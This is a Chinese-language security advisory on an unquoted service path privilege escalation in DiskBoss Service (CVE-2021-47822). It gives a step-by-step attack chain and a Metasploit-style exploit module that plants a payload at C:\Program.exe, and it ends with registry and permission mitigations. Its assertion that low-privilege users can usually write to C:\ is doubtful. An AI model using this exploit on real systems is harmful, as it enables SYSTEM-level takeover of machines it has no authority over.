CVE-2021-47822 DiskBoss Service未加引号服务路径权限提升漏洞

漏洞信息

漏洞编号

CVE-2021-47822

漏洞类型

未加引号服务路径

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

DiskBoss Service

漏洞概述

CVE-2021-47822是存在于DiskBoss Service 12.2.18版本中的一个高危本地权限提升漏洞。该漏洞的根本原因在于Windows服务配置中的二进制路径未使用引号包裹，导致路径解析存在歧义。当Windows服务启动时，如果服务路径没有正确使用引号包围，操作系统会从第一个空格处截断路径并尝试查找并执行该位置的程序。攻击者可以利用这一特性，在服务路径中的中间目录放置恶意可执行文件，从而在服务重启或系统启动时以SYSTEM高权限自动执行恶意代码。由于DiskBoss服务通常以系统最高权限运行，攻击成功后可获得完全的系统控制权。此漏洞需要攻击者具备本地访问权限和低权限用户身份，但无需任何用户交互即可实现攻击。该漏洞的CVSS评分达到7.8分，属于高危级别，对企业内网安全构成严重威胁。攻击者可能利用此漏洞从普通用户权限提升至系统管理员权限，进而在内网中横向移动或部署后门程序。

技术细节

该漏洞属于Windows服务路径解析安全问题的经典类型。DiskBoss服务在Windows服务控制管理器中注册时，其ImagePath注册表键值未使用引号包围包含空格的路径。当Windows服务启动时，SCM（Service Control Manager）会调用CreateProcess函数执行服务二进制文件。CreateProcess在解析路径时，如果遇到空格会从第一个空格处分割字符串，然后依次尝试查找是否存在与分割后路径同名的可执行文件。例如，如果服务路径为C:\Program Files\DiskBoss\bin\diskbsa.exe，Windows会依次尝试执行：C:\Program.exe、C:\Program Files\DiskBoss.exe等。攻击者只需在C:\目录下放置名为Program.exe的恶意程序，当服务启动时就会以SYSTEM权限执行该恶意文件。攻击者需要具备在系统目录创建文件的权限（通常低权限用户可以通过在特定目录创建文件来实现），并且需要等待服务重启或系统重启才能触发漏洞利用。成功利用后可获得与DiskBoss服务相同级别的SYSTEM权限，实现完全的系统入侵。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先识别目标系统上安装的DiskBoss Service服务，检查其注册表配置中的ImagePath键值，确认路径是否未加引号包裹。可通过注册表查询reg query "HKLM\SYSTEM\CurrentControlSet\Services\DiskBoss"或使用wmic service命令获取服务信息。

STEP 2

步骤2：路径分析

分析服务路径中的空格位置和目录结构。例如路径C:\Program Files\DiskBoss\bin\diskbsa.exe包含多个空格，Windows会从第一个空格处尝试查找可执行文件，依次尝试C:\Program.exe、C:\Program Files\DiskBoss.exe等。

STEP 3

步骤3：权限检查

确认攻击者当前用户权限，验证是否具有在被利用目录（C:\）创建文件的权限。低权限用户通常可以在特定目录创建文件，这是利用该漏洞的前提条件。

STEP 4

步骤4：恶意程序部署

在目标路径位置（如C:\Program.exe）部署恶意可执行文件。该文件应包含反弹shell、远程控制木马或其他恶意载荷，以便获取SYSTEM权限的远程访问能力。

STEP 5

步骤5：触发漏洞

等待DiskBoss服务重启或系统重启。服务重启可通过多种方式触发：系统管理员手动重启服务、系统更新触发服务重启、目标系统重启等。服务启动时Windows会执行第一个找到的可执行文件即恶意程序。

STEP 6

步骤6：权限获取

恶意程序以SYSTEM权限自动执行，攻击者成功获得系统最高权限。随后可进行横向移动、权限维持、敏感数据窃取等后续入侵操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Metasploit Module for CVE-2021-47822 - DiskBoss Service Unquoted Service Path # This module exploits the unquoted service path vulnerability in DiskBoss Service # Target: DiskBoss Service 12.2.18 # Author: VulnCheck # Disclosure: [email protected] require 'msf/core/exploit/exe' class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking def initialize(info = {}) super(update_info(info, 'Name' => 'DiskBoss Service Unquoted Service Path Privilege Escalation', 'Description' => %q{ This module exploits an unquoted service path vulnerability in DiskBoss Service. The vulnerability exists because the service binary path is not properly quoted, allowing attackers to place malicious executables in intermediate path directories. When the service starts, Windows will attempt to execute the malicious binary with SYSTEM privileges. }, 'License' => MSF_LICENSE, 'Author' => ['VulnCheck'], 'DisclosureDate' => '2022-01-16', 'Platform' => ['win'], 'Targets' => [['Automatic', {}]], 'DefaultTarget' => 0, 'References' => [ ['CVE', '2021-47822'], ['URL', 'https://www.vulncheck.com/advisories/diskboss-service-diskbsaexe-unquoted-service-path'], ['EDB', '49899'] ] )) end def exploit # Generate payload executable payload_exe = generate_payload_exe # Target path where malicious executable will be placed # The service path is typically: C:\Program Files\DiskBoss\bin\diskbsa.exe # We target the intermediate directory 'Program' to gain execution target_path = "C:\\Program.exe" print_status("Placing malicious executable at #{target_path}") # Write the payload to the target path write_file(target_path, payload_exe) print_good("Malicious executable placed successfully!") print_status("Waiting for service restart to trigger payload execution...") print_status("The DiskBoss service will execute C:\\Program.exe with SYSTEM privileges") end end

影响范围

DiskBoss Service 12.2.18及之前版本

防御指南

临时缓解措施

立即为DiskBoss服务路径添加引号：在注册表编辑器中定位HKLM\SYSTEM\CurrentControlSet\Services\DiskBoss\ImagePath，将路径修改为"C:\Program Files\DiskBoss\bin\diskbsa.exe"（包含外侧双引号）。同时检查并修复其他存在类似问题的服务。限制C:\等系统根目录的写入权限，阻止攻击者部署恶意程序。考虑暂时禁用DiskBoss服务直到官方补丁发布。